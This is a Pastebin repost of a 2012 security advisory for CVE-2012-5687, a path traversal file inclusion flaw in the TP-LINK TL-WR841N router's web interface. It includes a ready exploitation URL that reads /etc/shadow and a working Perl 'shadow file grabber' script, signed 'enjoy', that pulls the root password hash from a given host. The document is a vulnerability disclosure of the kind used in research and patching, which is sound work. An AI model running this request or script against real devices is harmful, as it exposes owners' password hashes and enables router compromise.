Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- | ____| | | (_) | | | / ____| | | (_) |
- | |__ __ ___ __ | | ___ _| |_ | |__ _ _ | | _ _| |__ ___ _ __ ___ ___ ___ _ _ _ __ _| |_ _ _
- | __| \ \/ / '_ \| |/ _ \| | __| | '_ \| | | | | | | | | | '_ \ / _ \ '__/ __|/ _ \/ __| | | | '__| | __| | | |
- | |____ > <| |_) | | (_) | | |_ | |_) | |_| | | |___| |_| | |_) | __/ | \__ \ __/ (__| |_| | | | | |_| |_| |
- |______/_/\_\ .__/|_|\___/|_|\__| |_.__/ \__, | \_____\__, |_.__/ \___|_| |___/\___|\___|\__,_|_| |_|\__|\__, |
- | | __/ | __/ | __/ |
- |_| |___/ |___/ |___/
- ##################################################################################################################
- | Security Advisory - TP-LINK TL-WR841N LFI |=
- Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK"
- Firmware Version: 3.13.9 Build 120201 Rel.54965n And Below versions
- Discovered Date: 24/10/2012
- CVE-ID: CVE-2012-5687
- Author: Matan Azugi [matan (at) madsec.co (dot) il [email concealed]] Product Vendor:
- http://www.tp-link.com/en/products/details/?model=TL-WR841N
- Details:
- TP-LINK TL-WR841N Wireless Router is prone to a Local File Inclusion(LFI)
- Vulnerability.
- The vulnerability exists in Web-Based Management. The URL parameter is not
- properly sanitized before being used.
- Exploitation URL:
- http://192.168.0.1/help/../../../../../../../../etc/shadow
- Successful exploitation allows viewing the router configuration and password
- files.
- Proof of Concept Code:
- #TP-LINK TL-WR841N Shadow file grabber#
- #built by Pulse matan (at) madsec.co (dot) il [email concealed]#
- #enjoy#
- use LWP::UserAgent;
- $host = $ARGV[0];
- chomp($host);
- if($host !~ /http:\/\//) { $host = "http://$host"; };
- my $ua = LWP::UserAgent->new;
- $ua->timeout(30);
- $lfi = "/help/../../../../../../../../etc/shadow";
- $url = $host.$lfi;
- $request = HTTP::Request->new('GET', $url); $response =
- $ua->request($request); my $html = $response->content; if($html =~ /root/) {
- print "root$' \n" ; }
- Thank You,
- Matan Azugi, MCSE OSCP
Add Comment
Please, Sign In to add comment